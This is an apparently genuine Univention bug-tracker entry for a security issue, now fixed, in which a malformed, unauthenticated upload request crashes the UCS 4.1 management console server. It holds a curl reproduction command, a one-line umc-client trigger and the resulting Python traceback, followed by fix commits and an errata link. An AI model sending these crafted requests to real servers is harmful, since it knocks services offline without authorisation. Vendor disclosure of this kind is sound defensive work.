First Last Prev Next    This bug is not in your last search results.
Bug 41370 - UMC server crashes on malicious upload request
UMC server crashes on malicious upload request
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: UMC (Generic)
UCS 4.1
Other Linux
: P5 major (vote)
: UCS 4.1-2-errata
Assigned To: Florian Best
Dirk Wiesenthal
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-05-27 11:59 CEST by Dirk Wiesenthal
Modified: 2021-06-23 07:29 CEST (History)
1 user (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: 7: Crash: Bug causes crash or data loss
Who will be affected by this bug?: 5: Will affect all installed domains
How will those affected feel about the bug?: 5: Blocking further progress on the daily work
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Dirk Wiesenthal univentionstaff 2016-05-27 11:59:34 CEST 
curl -s --cookie "$COOKIEJAR" --cookie-jar "$COOKIEJAR" -H "Content-Type: application/json" -d '{"flavor": null, "options": ["type=README", "component_id=test-x_20160527104755", "ucs_version=4.1"]}' "http://$host/umcp/upload/appcenter-selfservice/upload"

27.05.16 10:59:18.533  MAIN        ( ERROR   ) : Traceback (most recent call last):
  File "/usr/sbin/univention-management-console-server", line 236, in <module>
    umc_daemon.do_action()
  File "/usr/lib/pymodules/python2.7/daemon/runner.py", line 186, in do_action
    func(self)
  File "/usr/sbin/univention-management-console-server", line 161, in _crestart
    self._start()
  File "/usr/lib/pymodules/python2.7/daemon/runner.py", line 131, in _start
    self.app.run()
  File "/usr/sbin/univention-management-console-server", line 204, in run
    notifier.loop()
  File "/usr/lib/pymodules/python2.7/notifier/nf_generic.py", line 286, in loop
    step()
  File "/usr/lib/pymodules/python2.7/notifier/nf_generic.py", line 273, in step
    not __sockets[ cond ][ fd ]( sock_obj ):
  File "/usr/lib/pymodules/python2.7/univention/management/console/protocol/server.py", line 178, in _receive
    res = Response(msg)
  File "/usr/lib/pymodules/python2.7/univention/management/console/protocol/message.py", line 304, in __init__
    self.options = request.options
  File "/usr/lib/pymodules/python2.7/univention/management/console/protocol/message.py", line 192, in <lambda>
    options = property(lambda self: self._get_key('options'), lambda self, value: self._set_key('options', value))
  File "/usr/lib/pymodules/python2.7/univention/management/console/protocol/message.py", line 177, in _get_key
    return self.body.get(key)
AttributeError: 'str' object has no attribute 'get'
Comment 1 Florian Best univentionstaff 2016-05-27 12:38:14 CEST 
This is not nice! You don't need to be authenticated to do this. And the UMC-Server port is opened everywhere.

umc-client -s example.com -n UPLOAD foo -F /dev/null
Comment 2 Florian Best univentionstaff 2016-06-27 18:56:50 CEST 
univention-management-console.yaml:
r70660 | YAML Bug #41370

univention-management-console (8.0.28-16):
r70659 | Bug #41370: fix crashing of server on malicious request data
r70658 | Bug #41370: fix crashing of server on malicious request data
Comment 3 Dirk Wiesenthal univentionstaff 2016-06-29 10:34:58 CEST 
Code: OK
YAML: OK
Comment 4 Janek Walkenhorst univentionstaff 2016-07-21 15:16:18 CEST 
<http://errata.software-univention.de/ucs/4.1/212.html>
First Last Prev Next    This bug is not in your last search results.